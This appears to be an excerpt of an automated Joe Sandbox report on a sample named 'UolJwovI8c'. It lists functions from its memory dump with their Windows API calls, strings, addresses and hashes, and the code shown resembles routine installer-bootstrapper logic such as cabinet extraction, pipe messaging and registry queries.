Instruction ID: 36a36fc526a07a954545dcf6356bff5f5a9a9b88e624db8be36151e003d4d4bc
Opcode Fuzzy Hash: bbc951da19949b14b4644e103ae23fa947d3715d5455a3de9278cf796b8b5faa
Instruction Fuzzy Hash: 6521D832E41215F7EB309AD59C49FAFBF6DBB45B60F114126F944BB280EA709E009690

Function 00594212 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32(00000000,00000000,?,00000000,crypt32.dll,?,?,005A4028,00000001,feclient.dll,?,00000000,?,?,?,00594B12), ref: 0059424D
GetLastError.KERNEL32(?,?,005A4028,00000001,feclient.dll,?,00000000,?,?,?,00594B12,?,?,005DB488,?,00000001), ref: 00594259
GetCurrentDirectoryW.KERNEL32(00000000,?,?,00000000,?,?,005A4028,00000001,feclient.dll,?,00000000,?,?,?,00594B12,?), ref: 00594294
GetLastError.KERNEL32(?,?,005A4028,00000001,feclient.dll,?,00000000,?,?,?,00594B12,?,?,005DB488,?,00000001), ref: 0059429E

Strings

dirutil.cpp, xrefs: 005942C2
crypt32.dll, xrefs: 00594216

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: CurrentDirectoryErrorLast
String ID: crypt32.dll$dirutil.cpp
API String ID: 152501406-1104880720
Opcode ID: 2743776942da84e2be6d9da639f4cfbdf7b2777909f18a26915238c91843aa12
Instruction ID: f42398337f214382fe25c49331d7abcc80b3c20dc833526e7726af895c580f5e
Opcode Fuzzy Hash: 2743776942da84e2be6d9da639f4cfbdf7b2777909f18a26915238c91843aa12
Instruction Fuzzy Hash: AF11A57AA01637AB9F215BD58844E5BBF98BF15761F160166FD00E7200EB20DC019AE0

Function 005B0B8E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 74fileCOMMON

Download Yara Rule

APIs

_memcpy_s.LIBCMT ref: 005B0BDE
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 005B0BFD
GetLastError.KERNEL32 ref: 005B0C07

Strings

Failed to write during cabinet extraction., xrefs: 005B0C35
Unexpected call to CabWrite()., xrefs: 005B0BC1
cabextract.cpp, xrefs: 005B0C2B

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: ErrorFileLastWrite_memcpy_s
String ID: Failed to write during cabinet extraction.$Unexpected call to CabWrite().$cabextract.cpp
API String ID: 1970631241-3111339858
Opcode ID: 01bafff67d3246442d3901ad329ecd2ee951663a9531d9abd97e35d4418c5481
Instruction ID: c54f03d8010a3f4b32e28fbceccb0f7374e8f45732fcba9200bacfbc2eb6ed07
Opcode Fuzzy Hash: 01bafff67d3246442d3901ad329ecd2ee951663a9531d9abd97e35d4418c5481
Instruction Fuzzy Hash: E221D17A500205EBCB14DF6DD985D9A7FA9FF88720B21425AFE14C7285E731ED00DB60

Function 00599AE0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 72COMMON

Download Yara Rule

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 00599AFB
GetFileAttributesW.KERNEL32(00000000,000002C0,?,00000000,00000000,000002C0,00000100,00000000,00000000,?,0059A8B4,00000100,000002C0,000002C0,00000100), ref: 00599B10
GetLastError.KERNEL32(?,0059A8B4,00000100,000002C0,000002C0,00000100), ref: 00599B1B

Strings

Failed to set variable., xrefs: 00599B7A
Failed while searching directory search: %ls, for path: %ls, xrefs: 00599B54
Failed to format variable string., xrefs: 00599B06

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: AttributesErrorFileLastOpen@16
String ID: Failed to format variable string.$Failed to set variable.$Failed while searching directory search: %ls, for path: %ls
API String ID: 1811509786-402580132
Opcode ID: d98a3345d5cad9d522c4c89cf1c74edd45dff5c64ee652da51f25b643b473237
Instruction ID: 412eed8f8c9cdee9e8a3afe097a0c9e8b9935e7381a2092afa96bb0669b9e896
Opcode Fuzzy Hash: d98a3345d5cad9d522c4c89cf1c74edd45dff5c64ee652da51f25b643b473237
Instruction Fuzzy Hash: 69110676944526FBDF22569CAC46F6DBF1AFF14360F11031BF910B629087299D10A2D4

Function 005B0C57 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 70timeCOMMON

Download Yara Rule

APIs

DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 005B0CC4
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 005B0CD6
SetFileTime.KERNEL32(?,?,?,?), ref: 005B0CE9
CloseHandle.KERNEL32(000000FF,?,?,?,?,?,?,?,?,?,?,?,?,005B08B1,?,?), ref: 005B0CF8

Strings

Invalid operation for this state., xrefs: 005B0C9D
cabextract.cpp, xrefs: 005B0C93

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: Time$File$CloseDateHandleLocal
String ID: Invalid operation for this state.$cabextract.cpp
API String ID: 609741386-1751360545
Opcode ID: 608bb06b3b67d1fe371ddb9b735a5e399a416448bf436de433866d32a7a3ad2e
Instruction ID: 25f0af2af33da29a041c5c0dca04f4bfa7791e6b65d208f93bbfeb3c27e27451
Opcode Fuzzy Hash: 608bb06b3b67d1fe371ddb9b735a5e399a416448bf436de433866d32a7a3ad2e
Instruction Fuzzy Hash: E921A17280121AAB8B209FA8C9099EBBFADFF047207504217F854D65D0D774FA11CB90

Function 005A4A77 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 68fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,crypt32.dll,00000000,00000000,00000000,?,005A539D), ref: 005A4AC3

Strings

Failed to write message type to pipe., xrefs: 005A4B05
Failed to allocate message to write., xrefs: 005A4AA2
crypt32.dll, xrefs: 005A4A7D
pipe.cpp, xrefs: 005A4AFB

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: FileWrite
String ID: Failed to allocate message to write.$Failed to write message type to pipe.$crypt32.dll$pipe.cpp
API String ID: 3934441357-606776022
Opcode ID: 464ac829ce96fbc203ca38bb7799c6d4232788ac904892457eb104e2029a4729
Instruction ID: 26eadd38ae29589c0d246ccb8b99a8f7c431cc45ede651ef1bc2d03539aeccde
Opcode Fuzzy Hash: 464ac829ce96fbc203ca38bb7799c6d4232788ac904892457eb104e2029a4729
Instruction Fuzzy Hash: C4119D32941129FBDF258FC5DD09A9E7FAAFB81750F114166F900B6240D7B09E10EAA0

Function 005A4642 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 64COMMON

Download Yara Rule

APIs

Part of subcall function 0059394F: GetProcessHeap.KERNEL32(?,000001C7,?,00592274,000001C7,00000001,80004005,8007139F,?,?,005D0267,8007139F,?,00000000,00000000,8007139F), ref: 00593960
Part of subcall function 0059394F: RtlAllocateHeap.NTDLL(00000000,?,00592274,000001C7,00000001,80004005,8007139F,?,?,005D0267,8007139F,?,00000000,00000000,8007139F), ref: 00593967

_memcpy_s.LIBCMT ref: 005A4693
_memcpy_s.LIBCMT ref: 005A46A6
_memcpy_s.LIBCMT ref: 005A46C1

Strings

Failed to allocate memory for message., xrefs: 005A467C
feclient.dll, xrefs: 005A465B, 005A4691
pipe.cpp, xrefs: 005A4672

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: _memcpy_s$Heap$AllocateProcess
String ID: Failed to allocate memory for message.$feclient.dll$pipe.cpp
API String ID: 886498622-766083570
Opcode ID: 20b8041e8a6f554a43d42984b7c4a85ecc271877ed39769837dc1c50cf4f1270
Instruction ID: ce3d59ef6558245af1c2183537c9aec60e65bd993d9f8d583d264f2096baba51
Opcode Fuzzy Hash: 20b8041e8a6f554a43d42984b7c4a85ecc271877ed39769837dc1c50cf4f1270
Instruction Fuzzy Hash: 29119EB650131AABDF11AE94CC86DEB7BADFF85B10B00452AFA109B141D7B1D654CBE0

Function 005967AA Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 56COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 005967E3
GetLastError.KERNEL32 ref: 005967ED

Strings

variable.cpp, xrefs: 00596811
Failed to get temp path., xrefs: 0059681B
Failed to set variant value., xrefs: 00596837
4#v, xrefs: 005967E3

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: ErrorLastPathTemp
String ID: 4#v$Failed to get temp path.$Failed to set variant value.$variable.cpp
API String ID: 1238063741-2550301277
Opcode ID: b80ebc73e2e69370a43a23216cf032c42ab2b559fba0f403445f9eee6a595d8c
Instruction ID: 3bae1f6843b484315c210bc8e00619277ced4ea1e5989cc5c9fcb4a65cd7232d
Opcode Fuzzy Hash: b80ebc73e2e69370a43a23216cf032c42ab2b559fba0f403445f9eee6a595d8c
Instruction Fuzzy Hash: B401C872E4223AA7DB30A7545C0AFEA7F98BB14B10F110157FD04F7281EA60AD0496D5

Function 005D96CD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

Strings

ReleaseSRWLockExclusive, xrefs: 005D970C
AcquireSRWLockExclusive, xrefs: 005D96FC
KERNEL32.DLL, xrefs: 005D96E7

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID:
String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
API String ID: 0-1718035505
Opcode ID: cc7f615c8b5185a8c992e07770bed905a668337f90560275ce017c03deb0bf8b
Instruction ID: c73bc3b6f0da3f166bf0df7dbb8e4ed685ecda4a40eefdcfd5309759930389c6
Opcode Fuzzy Hash: cc7f615c8b5185a8c992e07770bed905a668337f90560275ce017c03deb0bf8b
Instruction Fuzzy Hash: 9701F4717932229B5F301E6D9CC49B72F88BA163D1311017BE631D3300EB55C849F790

Function 005D0ACC Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 41libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,?,00595EB2,00000000), ref: 005D0AE0
GetProcAddress.KERNEL32(00000000), ref: 005D0AE7
GetLastError.KERNEL32(?,?,?,00595EB2,00000000), ref: 005D0AFE

Strings

IsWow64Process, xrefs: 005D0AD1
kernel32, xrefs: 005D0AD8
procutil.cpp, xrefs: 005D0B1F

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: AddressErrorHandleLastModuleProc
String ID: IsWow64Process$kernel32$procutil.cpp
API String ID: 4275029093-1586155540
Opcode ID: b84d5b7fa7d7c3ceb230920ec993fdf735a321f00cad7b7633eaa31ed9251ec5
Instruction ID: 545dad08f44f1d1085bebadaa4aadd9d3f56dce69468c622e13883c31988a717
Opcode Fuzzy Hash: b84d5b7fa7d7c3ceb230920ec993fdf735a321f00cad7b7633eaa31ed9251ec5
Instruction Fuzzy Hash: C9F0A972A45229E7E7309B999C09A5F7F54BB04750F010157BD04A7380EB70DE0097D0

Function 005A9287 Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 139COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 005A93C9

Part of subcall function 005D56CF: GetLastError.KERNEL32(?,?,005A933A,?,00000003,00000000,?), ref: 005D56EE

Strings

Failed to get certificate public key identifier., xrefs: 005A93F7
Failed to find expected public key in certificate chain., xrefs: 005A938A
yTY, xrefs: 005A9287
cache.cpp, xrefs: 005A93ED
Failed to read certificate thumbprint., xrefs: 005A93BD

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: ErrorLast
String ID: Failed to find expected public key in certificate chain.$Failed to get certificate public key identifier.$Failed to read certificate thumbprint.$cache.cpp$yTY
API String ID: 1452528299-1519453984
Opcode ID: 54dbe1eed995bd55401b8955d3c9f010c0ceffaff2a44cc2cff82ce0318a4ea4
Instruction ID: 543b81a6cc20d7c6a156a5d0d0e83747b732bfc7e38d7c7ac776fe5faf6c3958
Opcode Fuzzy Hash: 54dbe1eed995bd55401b8955d3c9f010c0ceffaff2a44cc2cff82ce0318a4ea4
Instruction Fuzzy Hash: 78416871E00229AFDF10DBA9C845AEEBBB8BF09710F014566F905E7291D774ED04CBA0

Function 005A8CAC Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 122sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000007D0,00000000,00000000), ref: 005A8D18

Strings

Failed to get old %hs package cache root directory., xrefs: 005A8DB8
Failed to get %hs package cache root directory., xrefs: 005A8D78
per-machine, xrefs: 005A8D69, 005A8DA9
Failed to calculate cache path., xrefs: 005A8CD5
per-user, xrefs: 005A8D72, 005A8D77, 005A8DB2, 005A8DB7

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: Sleep
String ID: Failed to calculate cache path.$Failed to get %hs package cache root directory.$Failed to get old %hs package cache root directory.$per-machine$per-user
API String ID: 3472027048-398165853
Opcode ID: 40badcf20b876e944ec44b26bcd794a88ae2724cff508233239b6cbfcfa57727
Instruction ID: 8ec79abd6b4301bf619717a81a1fb5a66b97414d02747e0036921d7599808204
Opcode Fuzzy Hash: 40badcf20b876e944ec44b26bcd794a88ae2724cff508233239b6cbfcfa57727
Instruction Fuzzy Hash: DB31E772A40626BBEF226664CC46FBF6E6CFF61760F114426FD00F62D1DB348D0096A1

Function 005AE956 Relevance: 9.1, APIs: 6, Instructions: 85windowCOMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000082,?,?), ref: 005AE985
SetWindowLongW.USER32(?,000000EB,00000000), ref: 005AE994
SetWindowLongW.USER32(?,000000EB,?), ref: 005AE9A8
DefWindowProcW.USER32(?,?,?,?), ref: 005AE9B8
GetWindowLongW.USER32(?,000000EB), ref: 005AE9D2
PostQuitMessage.USER32(00000000), ref: 005AEA31

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: Window$Long$Proc$MessagePostQuit
String ID:
API String ID: 3812958022-0
Opcode ID: 5b474e60b3d84591d9a830264e69bcdc8c77bf60496cbab9ac6ba636071c2891
Instruction ID: aa0f7442b44faa4bb70534c28e5647b3ddf086d661fa5e4dbcf755c4fd9c87a4
Opcode Fuzzy Hash: 5b474e60b3d84591d9a830264e69bcdc8c77bf60496cbab9ac6ba636071c2891
Instruction Fuzzy Hash: 1C21AE35104205EFDF119F68DC0EE6E3F66FF96351F158A19F906AA1A4C7319D10AB50

Function 005AC7C9 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 164synchronizationCOMMON

Download Yara Rule

APIs

ReleaseMutex.KERNEL32(?), ref: 005AC811
CloseHandle.KERNEL32(?), ref: 005AC819

Strings

Unexpected elevated message sent to child process, msg: %u, xrefs: 005AC9C4
Failed to save state., xrefs: 005AC891
elevation.cpp, xrefs: 005AC9B8

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: CloseHandleMutexRelease
String ID: Failed to save state.$Unexpected elevated message sent to child process, msg: %u$elevation.cpp
API String ID: 4207627910-1576875097
Opcode ID: be0ad57c67efc4be813df0b6195c593846965796d2fa888192343b45644917cb
Instruction ID: 41cb5d534ebd77777d6720a538eb18e807946d762b00a1b8eb3007db68adf4a1
Opcode Fuzzy Hash: be0ad57c67efc4be813df0b6195c593846965796d2fa888192343b45644917cb
Instruction Fuzzy Hash: C861C53A100515EFCF229F84DD05C6ABFB2FF493147158959FAA95A632C732E821EF41

Function 005D7B16 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 162COMMON

Download Yara Rule

APIs

Part of subcall function 0059394F: GetProcessHeap.KERNEL32(?,000001C7,?,00592274,000001C7,00000001,80004005,8007139F,?,?,005D0267,8007139F,?,00000000,00000000,8007139F), ref: 00593960
Part of subcall function 0059394F: RtlAllocateHeap.NTDLL(00000000,?,00592274,000001C7,00000001,80004005,8007139F,?,?,005D0267,8007139F,?,00000000,00000000,8007139F), ref: 00593967

SysFreeString.OLEAUT32(00000000), ref: 005D7C74
SysFreeString.OLEAUT32(00000000), ref: 005D7C7F
SysFreeString.OLEAUT32(00000000), ref: 005D7C8A

Strings

atomutil.cpp, xrefs: 005D7B49
`Dv, xrefs: 005D7C69

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: FreeString$Heap$AllocateProcess
String ID: `Dv$atomutil.cpp
API String ID: 2724874077-1153537316
Opcode ID: 3a9f8bdc60f547499c798fb0e959bf3b858ee67d33253f1d7278d6d226e88114
Instruction ID: ba64fdcba0cc15f20ab6f9bdbf052efb40927f26bb6ec0ba4576925fa56ff454
Opcode Fuzzy Hash: 3a9f8bdc60f547499c798fb0e959bf3b858ee67d33253f1d7278d6d226e88114
Instruction Fuzzy Hash: AE51637191522EAFDB31DB68C848EAEBBB8BF48710F15419BE505AB360E771DD00DB90

Function 005D1217 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 150registrystringCOMMON

Download Yara Rule

APIs

RegQueryValueExW.ADVAPI32(00000000,000002C0,00000000,000002C0,00000000,00000000,000002C0,BundleUpgradeCode,00000410,000002C0,00000000,00000000,00000000,00000100,00000000), ref: 005D123F
RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?,?,?,?,?,005A70E8,00000100,000000B0,00000088,00000410,000002C0), ref: 005D1276
lstrlenW.KERNEL32(?,?,?,00000000,?,-00000001,00000004,00000000), ref: 005D136E

Strings

regutil.cpp, xrefs: 005D12BF
BundleUpgradeCode, xrefs: 005D121E

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: QueryValue$lstrlen
String ID: BundleUpgradeCode$regutil.cpp
API String ID: 3790715954-1648651458
Opcode ID: 0328cd6b515365f110a6b463ddef75c664488fb0a7fa52d4a67d082124d478b7
Instruction ID: 74d3f3d5bc189b3ee2529d91f2b3aa2913551b838c63daa42dd24392b8c30d7e
Opcode Fuzzy Hash: 0328cd6b515365f110a6b463ddef75c664488fb0a7fa52d4a67d082124d478b7
Instruction Fuzzy Hash: 2341A335A0091AFFDF319F99C844AAEBFA9BB44710F15456BE901EB700DA319D00DBA9

Function 005D6357 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 130fileCOMMON

Download Yara Rule

APIs

Part of subcall function 005D490D: SetFilePointerEx.KERNELBASE(?,?,?,?,?,00000000,?,?,?,005A8770,00000000,00000000,00000000,00000000,00000000), ref: 005D4925
Part of subcall function 005D490D: GetLastError.KERNEL32(?,?,?,005A8770,00000000,00000000,00000000,00000000,00000000), ref: 005D492F

WriteFile.KERNEL32(?,?,00000000,?,00000000,?,005D5C09,?,?,?,?,?,?,?,00010000,?), ref: 005D63C0
WriteFile.KERNEL32(000000FF,00000008,00000008,?,00000000,000000FF,00000000,00000000,00000000,00000000,?,005D5C09,?,?,?,?), ref: 005D6412
GetLastError.KERNEL32(?,005D5C09,?,?,?,?,?,?,?,00010000,?,00000001,?,GET,?,?), ref: 005D6458
GetLastError.KERNEL32(?,005D5C09,?,?,?,?,?,?,?,00010000,?,00000001,?,GET,?,?), ref: 005D647E

Strings

dlutil.cpp, xrefs: 005D64A2

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: ErrorFileLast$Write$Pointer
String ID: dlutil.cpp
API String ID: 133221148-2067379296
Opcode ID: 83cc703372612136800be541997e0ff0b4b99b97b5c8e90efa12ad2891a94e04
Instruction ID: 045eb27147740d7b9377b47e9e8fd1a906e504de0a2988254235f1353b3f19c4
Opcode Fuzzy Hash: 83cc703372612136800be541997e0ff0b4b99b97b5c8e90efa12ad2891a94e04
Instruction Fuzzy Hash: 40419C7294021AFBEF318E98CD84BAA7F69FF04324F114227BD00A6290D771DD21DBA1

Function 00592428 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120COMMONLIBRARYCODE

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(?,00000000,005CFFEF,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,005CFFEF,005B12CF,?,00000000), ref: 0059246E
GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,005CFFEF,005B12CF,?,00000000,0000FDE9,?,005B12CF), ref: 0059247A

Part of subcall function 00593BD3: GetProcessHeap.KERNEL32(00000000,000001C7,?,005921CC,000001C7,80004005,8007139F,?,?,005D0267,8007139F,?,00000000,00000000,8007139F), ref: 00593BDB
Part of subcall function 00593BD3: HeapSize.KERNEL32(00000000,?,005921CC,000001C7,80004005,8007139F,?,?,005D0267,8007139F,?,00000000,00000000,8007139F), ref: 00593BE2

Strings

